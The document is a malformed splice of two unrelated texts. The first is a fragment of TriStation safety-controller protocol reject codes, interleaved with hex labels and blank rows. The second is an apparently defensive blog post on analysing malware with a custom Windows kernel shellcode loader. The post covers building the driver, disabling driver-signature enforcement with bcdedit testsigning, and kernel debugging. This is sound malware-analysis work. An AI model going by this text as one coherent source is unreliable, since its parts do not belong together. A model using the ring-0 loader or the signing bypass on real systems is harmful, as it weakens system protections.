137: 'Get SOE data response',

8A

138: 'Alocate network accepted',

8B

139: 'Load vector table accepted',

8C

140: 'Get calendar response',

8D

141: 'Label set',

8E

142: 'Get module types response',

8F

143: 'System variables configured',

90

144: 'Module deconfigured',

91

145: '<145>',

92

146: '<146>',

93

147: 'Get conversion table response',

94

148: 'ICM print data sent',

95

149: 'Set ICM status response',

96

150: 'Get system variables response',

97

151: 'Get module versions response',

98

152: 'Process MODBUS response',

99

153: 'Allocate program response',

9A

154: 'Allocate function response',

9B

155: 'Clear retentives response',

9C

156: 'Set initial values response',

9D

157: 'Set TS2 data area response',

9E

158: 'Get TS2 data response',

9F

159: 'Set TS2 data response',

A0

160: 'Set program information reponse',

A1

161: 'Get program information response',

A2

162: 'Upload program response',

A3

163: 'Upload function response',

A4

164: 'Get point groups response',

A5

165: 'Allocate symbol table response',

A6

166: 'Program timing response',

A7

167: 'Disable points full',

A8

168: 'Allocate multiple functions response',

A9

169: 'Get node number response',

AA

170: 'Symbol table response',

AB

 

AC

 

AD

 

AE

 

AF

 

B0

 

B1

 

B2

 

B3

 

B4

 

B5

 

B6

 

B7

 

B8

 

B9

 

BA

 

BB

 

BC

 

BD

 

BE

 

BF

 

C0

 

C1

 

C2

 

C3

 

C4

 

C5

 

C6

 

C7

 

C8

200: 'Wrong command',

C9

201: 'Load is in progress',

CA

202: 'Bad clock calendar data',

CB

203: 'Control program not halted',

CC

204: 'Control program checksum error',

CD

205: 'No memory available',

CE

206: 'Control program not valid',

CF

207: 'Not loading a control program',

D0

208: 'Network is out of range',

D1

209: 'Not enough arguments',

D2

210: 'A Network is missing',

D3

211: 'The download time mismatches',

D4

212: 'Key setting prohibits this operation',

D5

213: 'Bad control program version',

D6

214: 'Command not in correct sequence',

D7

215: '<215>',

D8

216: 'Bad Index for a module',

D9

217: 'Module address is invalid',

DA

218: '<218>',

DB

219: '<219>',

DC

220: 'Bad offset for an I/O point',

DD

221: 'Invalid point type',

DE

222: 'Invalid Point Location',

DF

223: 'Program name is invalid',

E0

224: '<224>',

E1

225: '<225>',

E2

226: '<226>',

E3

227: 'Invalid module type',

E4

228: '<228>',

E5

229: 'Invalid table type',

E6

230: '<230>',

E7

231: 'Invalid network continuation',

E8

232: 'Invalid scan time',

E9

233: 'Load is busy',

EA

234: 'An MP has re-educated',

EB

235: 'Invalid chassis or slot',

EC

236: 'Invalid SOE number',

ED

237: 'Invalid SOE type',

EE

238: 'Invalid SOE state',

EF

239: 'The variable is write protected',

F0

240: 'Node number mismatch',

F1

241: 'Command not allowed',

F2

242: 'Invalid sequence number',

F3

243: 'Time change on non-master TRICON',

F4

244: 'No free Tristation ports',

F5

245: 'Invalid Tristation I command',

F6

246: 'Invalid TriStation 1131 command',

F7

247: 'Only one chassis allowed',

F8

248: 'Bad variable address',

F9

249: 'Response overflow',

FA

250: 'Invalid bus',

FB

251: 'Disable is not allowed',

FC

252: 'Invalid length',

FD

253: 'Point cannot be disabled',

FE

254: 'Too many retentive variables',

FF

255: 'LOADER_CONNECT',

 

256: 'Unknown reject code'

Loading Kernel Shellcode

In the wake of recent hacking tool dumps, the FLARE team saw a spike in malware samples detonating kernel shellcode. Although most samples can be analyzed statically, the FLARE team sometimes debugs these samples to confirm specific functionality. Debugging can be an efficient way to get around packing or obfuscation and quickly identify the structures, system routines, and processes that a kernel shellcode sample is accessing.

This post begins a series centered on kernel software analysis, and introduces a tool that uses a custom Windows kernel driver to load and execute Windows kernel shellcode. I’ll walk through a brief case study of some kernel shellcode, how to load shellcode with FLARE’s kernel shellcode loader, how to build your own copy, and how it works.

As always, only analyze malware in a safe environment such as a VM; never use tools such as a kernel shellcode loader on any system that you rely on to get your work done.

A Tale of Square Pegs and Round Holes

Depending upon how a shellcode sample is encountered, the analyst may not know whether it is meant to target user space or kernel space. A common triage step is to load the sample in a shellcode loader and debug it in user space. With kernel shellcode, this can have unexpected results such as the access violation in Figure 1.


Figure 1: Access violation from shellcode dereferencing null pointer

The kernel environment is a world apart from user mode: various registers take on different meanings and point to totally different structures. For instance, while the gs segment register in 64-bit Windows user mode points to the Thread Information Block (TIB) whose size is only 0x38 bytes, in kernel mode it points to the Processor Control Region (KPCR) which is much larger. In Figure 1 at address 0x2e07d9, the shellcode is attempting to access the IdtBase member of the KPCR, but because it is running in user mode, the value at offset 0x38 from the gs segment is null. This causes the next instruction to attempt to access invalid memory in the NULL page. What the code is trying to do doesn’t make sense in the user mode environment, and it has crashed as a result.

In contrast, kernel mode is a perfect fit. Figure 2 shows WinDbg’s dt command being used to display the _KPCR type defined within ntoskrnl.pdb, highlighting the field at offset 0x38 named IdtBase.


Figure 2: KPCR structure

Given the rest of the code in this sample, accessing the IdtBase field of the KPCR made perfect sense. Determining that this was kernel shellcode allowed me to quickly resolve the rest of my questions, but to confirm my findings, I wrote a kernel shellcode loader. Here’s what it looks like to use this tool to load a small, do-nothing piece of shellcode.

Using FLARE’s Kernel Shellcode Loader

I booted a target system with a kernel debugger and opened an administrative command prompt in the directory where I copied the shellcode loader (kscldr.exe). The shellcode loader expects to receive the name of the file on disk where the shellcode is located as its only argument. Figure 3 shows an example where I’ve used a hex editor to write the opcodes for the NOP (0x90) and RET (0xC3) instructions into a binary file and invoked kscldr.exe to pass that code to the kernel shellcode loader driver. I created my file using the Windows port of xxd that comes with Vim for Windows.


Figure 3: Using kscldr.exe to load kernel shellcode
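
If xxd is not available, a few lines of Python produce the same two-byte test file; the output file name below is just an example.

# Equivalent to the xxd step above: write a NOP (0x90) followed by a RET (0xC3)
# into a binary file that can then be passed to kscldr.exe. The file name is an example.
with open("nop_ret.bin", "wb") as f:
    f.write(bytes([0x90, 0xC3]))

Passing that file name to kscldr.exe then produces the same result as the xxd-generated file shown in Figure 3.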

The shellcode loader prompts with a security warning. After clicking yes, kscldr.exe installs its driver and uses it to execute the shellcode. The system is frozen at this point because the kernel driver has already issued its breakpoint and the kernel debugger is awaiting commands. Figure 4 shows WinDbg hitting the breakpoint and displaying the corresponding source code for kscldr.sys.


Figure 4: Breaking in kscldr.sys

From the breakpoint, I use WinDbg with source-level debugging to step and trace into the shellcode buffer. Figure 5 shows WinDbg’s disassembly of the buffer after doing this.


Figure 5: Tracing into and disassembling the shellcode

The disassembly shows the 0x90 and 0xc3 opcodes from before, demonstrating that the shellcode buffer is indeed being executed. From here, the powerful facilities of WinDbg are available to debug and analyze the code’s behavior.

Building It Yourself

To try out FLARE’s kernel shellcode loader for yourself, you’ll need to download the source code.

To get started building it, download and install the Windows Driver Kit (WDK). I’m using Windows Driver Kit Version 7.1.0, which is command line driven, whereas more modern versions of the WDK integrate with Visual Studio. If you feel comfortable using a newer kit, you’re welcome to do so, but beware: you’ll have to take matters into your own hands regarding build commands and dependencies. Since WDK 7.1.0 is adequate for the purposes of this tool, that is the version I will describe in this post.

Once you have downloaded and installed the WDK, browse to the Windows Driver Kits directory in the start menu on your development system and select the appropriate environment. Figure 6 shows the WDK program group on a Windows 7 system. The term “checked build” indicates that debugging checks will be included. I plan to load 64-bit kernel shellcode, and I like having Windows catch my mistakes early, so I’m using the x64 Checked Build Environment.


Figure 6: Windows Driver Kits program group

In the WDK command prompt, change to the directory where you downloaded the FLARE kernel shellcode loader and type ez.cmd. The script will cause prompts to appear asking you to supply and use a password for a test signing certificate. Once the build completes, visit the bin directory and copy kscldr.exe to your debug target. Before you can commence using your custom copy of this tool, you’ll need to follow just a few more steps to prepare the target system to allow it.

Preparing the Debug Target

To debug kernel shellcode, I wrote a Windows software-only driver that loads and runs shellcode at privilege level 0. Normally, Windows only loads drivers that are signed with a special cross-certificate, but Windows allows you to enable testsigning to load drivers signed with a test certificate. We can create this test certificate for free, and it won’t allow the driver to be loaded on production systems, which is ideal.

In addition to enabling testsigning mode, it is necessary to enable kernel debugging to be able to really follow what is happening after the kernel shellcode gains execution. Starting with Windows Vista, we can enable both testsigning and kernel debugging by issuing the following two commands in an administrative command prompt followed by a reboot:

bcdedit.exe /set testsigning on

bcdedit.exe /set debug on

For debugging in a VM, I install VirtualKD, but you can also follow your virtualization vendor’s directions for connecting a serial port to a named pipe or other mechanism that WinDbg understands. Once that is set up and tested, we’re ready to go!

If you try the shellcode loader and get a blue screen indicating stop code 0x3B (SYSTEM_SERVICE_EXCEPTION), then you likely did not successfully connect the kernel debugger beforehand. Remember that the driver issues a software interrupt to give control to the debugger immediately before executing the shellcode; if the debugger is not successfully attached, Windows will blue screen. If this was the case, reboot and try again, this time first confirming that the debugger is in control by clicking Debug -> Break in WinDbg. Once you know you have control, you can issue the g command to let execution continue (you may need to disable driver load notifications to get it to finish the boot process without further intervention: sxd ld).

How It Works

The user-space application (kscldr.exe) copies the driver from a PE-COFF resource to the disk and registers it as a Windows kernel service. The driver implements device write and I/O control routines to allow interaction from the user application. Its driver entry point first registers dispatch routines to handle CreateFile, WriteFile, DeviceIoControl, and CloseHandle. It then creates a device named \Device\kscldr and a symbolic link making the device name accessible from user-space.